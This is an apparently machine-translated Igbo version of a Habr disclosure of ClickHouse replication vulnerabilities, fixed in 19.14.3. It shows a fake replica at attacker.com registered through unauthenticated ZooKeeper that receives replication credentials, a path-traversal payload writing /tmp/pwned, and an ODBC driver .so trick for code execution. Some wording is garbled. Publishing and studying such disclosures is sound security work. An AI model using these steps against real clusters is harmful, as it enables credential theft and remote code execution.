Edemede a ga-akọ akụkọ maka adịghị ike nke ukwuu na usoro mmegharị ClickHouse, ma gosipụtakwa ka enwere ike ịgbasa elu ọgụ.
ClickHouse bụ nchekwa data maka ịchekwa nnukwu data, na-ejikarị ihe karịrị otu oyiri. A na-ewu mkpokọta na nmegharịgharị na ClickHouse n'elu (ZK) ma chọọ ikike ide.
Nrụnye ZK ndabara anaghị achọ nyocha, yabụ puku kwuru puku sava ZK ejiri hazie Kafka, Hadoop, ClickHouse dị n'ihu ọha.
Iji belata elu ọgụ gị, ị kwesịrị ị na-ahazi nyocha na ikike mgbe ị na-etinye ZooKeeper
E nwere ụfọdụ 0day dabeere Java deserializations, ma were ya na onye mwakpo nwere ike ịgụ na dee na ZooKeeper, eji maka ClickHouse replication.
Mgbe ahaziri n'ụdị ụyọkọ, ClickHouse na-akwado ajụjụ ekesa , na-agafe na ZK - maka ha ka a na-emepụta ọnụ na mpempe akwụkwọ /clickhouse/task_queue/ddl.
Dịka ọmụmaatụ, ị na-emepụta ọnụ /clickhouse/task_queue/ddl/query-0001 nwere ọdịnaya:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']na mgbe nke ahụ gasịrị, a ga-ehichapụ tebụl ule na sava ụyọkọ host1 na host2. DDL na-akwado ịgba ọsọ CREATE/ALTER/DROP ajụjụ.
Ụda egwu? Mana olee ebe onye mwakpo nwere ike nweta adreesị nkesa?
na-arụ ọrụ na ọkwa nke tebụl onye ọ bụla, nke mere na mgbe e mepụtara tebụl na ZK, a na-akọwapụta ihe nkesa nke ga-ahụ maka iji mgbanwe metadata na oyiri. Dịka ọmụmaatụ, mgbe ị na-eme arịrịọ (ZK ga-ahazirịrị, chXX - aha nke oyiri, foobar - aha tebụl):
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;a ga-emepụta ọnụ ogidi и metadata.
Ọdịnaya /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpỌ ga-ekwe omume ijikọ data sitere na ụyọkọ a? Ee, ọ bụrụ ọdụ ụgbọ mmiri mmegharị (TCP/9009) na ihe nkesa chXX-address Agaghị emechi firewall ma agaghị ahazi nkwenye maka mmeghari. Kedu ka esi agafe nyocha?
Onye na-awakpo nwere ike ịmepụta oyiri ọhụrụ na ZK site na iṅomi ọdịnaya site na /clickhouse/tables/01-01/foobar/replicas/chXX na-agbanwe ihe ọ pụtara host.
Ọdịnaya /clickhouse/tables/01-01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpMgbe ahụ ị ga-agwa ndị ọzọ oyiri na e nwere ihe ọhụrụ ngọngọ nke data na ihe nkesa nke onye mwakpo ha kwesịrị iwere - a na-emepụta ọnụ na ZK. /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX monotonically counter counter, nke kwesịrị ịdị ukwuu karịa nke ikpeazụ na ndekọ ihe omume):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2ebe source_replica - aha nke oyiri nke onye mwakpo ahụ emebere na nzọụkwụ gara aga, ngọngọ_id - ihe nchọpụta ngọngọ data, na- - "nweta ngọngọ" iwu (na ).
Na-esote, oyiri nke ọ bụla na-agụ ihe omume ọhụrụ na ndekọ wee gaa na nkesa nke onye na-awakpo na-achịkwa iji nweta ngọngọ data (protocol replication bụ ọnụọgụ abụọ, na-agba ọsọ n'elu HTTP). Ihe nkesa attacker.com ga-anata arịrịọ:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXXebe XXX bụ data nyocha maka mmegharị. N'ọnọdụ ụfọdụ, nke a nwere ike ịbụ akaụntụ nwere ịnweta nchekwa data site na isi usoro ClickHouse yana protocol HTTP. Dịka ị hụla, elu ọgụ ahụ na-abawanye nke ukwuu n'ihi na ZooKeeper, nke ejiri mee mmegharị, hapụrụ na-ahazighị nyocha.
Ka anyị leba anya n'ọrụ nke ịnweta ngọngọ data site na oyiri, ejiri obi ike dee ya na ihe niile na-achịkwa dị mma na ntụkwasị obi dị n'etiti ha.
koodu nhazi mmeghari
Ọrụ ahụ na-agụ ndepụta faịlụ, wee aha ha, nha, ọdịnaya, wee dee ha na sistemụ faịlụ. Ọ bara uru ịkọwa iche iche ka esi echekwa data na sistemụ faịlụ.
Enwere ọtụtụ subdirectories na /var/lib/clickhouse (akwụkwọ ndekọ aha ndabere sitere na faịlụ nhazi):
ọkọlọtọ - ndekọ maka ndekọ , eji na mgbake mgbe data ọnwụ;
tmp - ndekọ maka ịchekwa faịlụ nwa oge;
user_files - arụmọrụ nwere faịlụ na arịrịọ bụ naanị na ndekọ a (INTO OUTFILE na ndị ọzọ);
metadata - sql faịlụ nwere nkọwa tebụl;
preprocessed_configs - faịlụ nhazi nke ahaziziri site na /etc/clickhouse-server;
data - akwụkwọ ndekọ aha ya na data n'onwe ya, na nke a maka nchekwa data ọ bụla, a na-emepụta subdirectory dị iche ebe a (dịka ọmụmaatụ. /var/lib/clickhouse/data/default).
Maka tebụl ọ bụla, a na-emepụta subdirectory na ndekọ nchekwa data. Kọlụm ọ bụla bụ faịlụ dị iche dabere na . Dịka ọmụmaatụ maka tebụl foobarOnye mwakpo mepụtara, a ga-emepụta faịlụ ndị a:
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2Ihe oyiri ahụ na-atụ anya ịnata faịlụ nwere otu aha mgbe ị na-ahazi ngọngọ data ma ọ naghị akwado ha n'ụzọ ọ bụla.
Ọ ga-abụ na onye na-agụ nke ọma anụla maka njikọ faịlụ_name adịghị mma na otu ọrụ WriteBufferFromFile. Ee, nke a na-enye onye na-awakpo ohere ide ọdịnaya aka ike na faịlụ ọ bụla na FS nwere ikike onye ọrụ clickhouse. Iji mee nke a, oyiri nke onye na-awakpo ahụ na-achịkwa ga-eweghachite nzaghachi ndị a na arịrịọ ahụ (agbakwunyere nkwụsịtụ ahịrị maka mfe nghọta):
x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeperna mgbe concatenation gasịrị ../../../../../../../../../tmp/pwned a ga-ede faịlụ ahụ /tmp/pwned na ọdịnaya hellofromzookeeper.
Enwere ọtụtụ nhọrọ maka ịtụgharị ikike ide faịlụ n'ime koodu mkpochapụ (RCE).
Akwụkwọ ọkọwa okwu mpụga na RCE
Na ụdị ochie, echekwara ndekọ ahụ nwere ntọala ClickHouse na ikike onye ọrụ ụlọ akụ ndabara. Faịlụ ntọala bụ faịlụ XML nke ọrụ ahụ na-agụ na mmalite wee chekwaa ya /var/lib/clickhouse/preprocessed_configs. Mgbe mgbanwe mere, a na-agụgharị ha. Ọ bụrụ na ị nwere ohere /etc/clickhouse-server onye na-awakpo nwere ike ịmepụta nke ya ụdị executable wee mebie koodu aka ike. Ụdị ClickHouse dị ugbu a anaghị enye ikike na ndabara, mana ọ bụrụ na ejiri nwayọọ nwayọọ emelite ihe nkesa, ikike ndị dị otú ahụ nwere ike ịdị. Ọ bụrụ na ị na-akwado ụyọkọ ClickHouse, lelee ikike dị na ndekọ ntọala, ọ ga-abụrịrị nke onye ọrụ. root.
ODBC ruo RCE
Mgbe ị na-etinye ngwugwu, a na-emepụta onye ọrụ clickhouse, mana emepụtaghị akwụkwọ ndekọ ụlọ ya /nonexistent. Agbanyeghị, mgbe ị na-eji akwụkwọ ọkọwa okwu mpụga, ma ọ bụ maka ebumnuche ndị ọzọ, ndị nchịkwa na-emepụta ndekọ /nonexistent ma nye onye ọrụ clickhouse ohere iji dee ya (SSZB! ihe ruru. onye ntụgharị okwu).
ClickHouse na-akwado ma nwee ike jikọọ na ọdụ data ndị ọzọ. Na ODBC, ị nwere ike ịkọwa ụzọ gaa n'ọbá akwụkwọ ọkwọ ụgbọ ala nchekwa data (.so). Ụdị ClickHouse ochie nyere gị ohere ime nke a ozugbo na onye na-arịọ arịrịọ, mana ugbu a agbakwunyere nyocha siri ike nke eriri njikọ na. odbc-bridge, yabụ na agaghịzi enwe ike ịkọwa ụzọ ọkwọ ụgbọ ala site na arịrịọ ahụ. Mana onye mwakpo ọ nwere ike iji adịghị ike akọwara n'elu degara akwụkwọ ndekọ aha ụlọ?
Ka anyị mepụta faịlụ ~/.odbc.ini nwere ọdịnaya dị ka nke a:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.somgbe ahụ na mmalite SELECT * FROM odbc('DSN=lalala', 'test', 'test'); a ga-ebuba ụlọ akwụkwọ ahụ test.so wee nweta RCE (ekele maka ntụzịaka).
Edozila adịghị ike ndị a na ndị ọzọ na ụdị ClickHouse 19.14.3. Lekọta ClickHouse na ZooKeepers gị!
isi: www.habr.com